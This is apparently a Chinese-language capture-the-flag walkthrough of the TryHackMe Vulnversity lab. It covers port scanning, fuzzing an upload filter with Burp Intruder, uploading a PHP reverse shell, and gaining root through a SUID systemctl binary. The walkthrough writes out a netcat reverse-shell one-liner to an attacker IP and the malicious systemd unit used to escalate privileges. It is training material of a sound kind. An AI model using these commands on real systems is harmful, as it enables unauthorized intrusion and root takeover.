Tryhackme - Vulnversity (考点：上传 & burp intruder & systemctl提权）

1 扫描

21想到进去找文件，22可能有ssh登录，139 445 去smb找文件，3128可能有代理转发，3333是http web进去搜集信息

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University

2 上传

ftp smb 都试了进不去。
再看看web信息搜集
dirbuster扫目录，但老是报错并暂停，
换gobuster扫gobuster dir -u http://10.10.118.147:3333 -w /root/directory-list-2.3-medium.txt -t 64 命令参数随版本不同可能有差异，这是kali2020的

internal这个目录发现上传功能
传php和图片版php都不成功。我传不带恶意代码的正常图片，几种格式，都说不被允许。。奇了怪了

随便再传个东西，burp抓包，枚举看看哪些格式ok。
发送到intruder
右边点clear，清除所有的绿色标识，然后在文件后缀那里，选中再重新标识上（点击右边的add）
这样png这个后缀位就是个变量了，毕竟我们只测后缀，所以后缀设变量就ok了
burp会在这里传各种后缀去检测，也就是banner.jpg 、 banner.gif 、banner.asp 等等

然后在payload这一栏。options那里点load 载入后缀字典文件

选seclist 的fuzzing 的 extension-most-common.fuzz.txt 这个字典是kali自带的。没有的话去github安装下载seclist

完后就可以右上角start attack了

结果显示有一个不一样。ok就把reverse shell 的php文件的php后缀改成这个后缀。再次上传，提示成功。

成功后不知道传到哪里去了，但按经验总是在uploads images这些目录下。很快就找到了。

http://10.10.118.147:3333/internal/uploads/

本机开监听，点击你传的文件，收到。并tty python -c 'import pty; pty.spawn("/bin/bash")'

3 提权

老套路linpeash.sh自动扫
suid是给予了root权限干活，扫到了这个

这个靶机jarvis也有一样的。虽然那个方法在这个靶机上不管用。。但是里面给的参考链接还是可以参考的。

换个方法，按参考链接里的，稍加修改
先造弹shell的文件。然后通过一系列设置，执行他

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.

本机开监听，收到，拿下root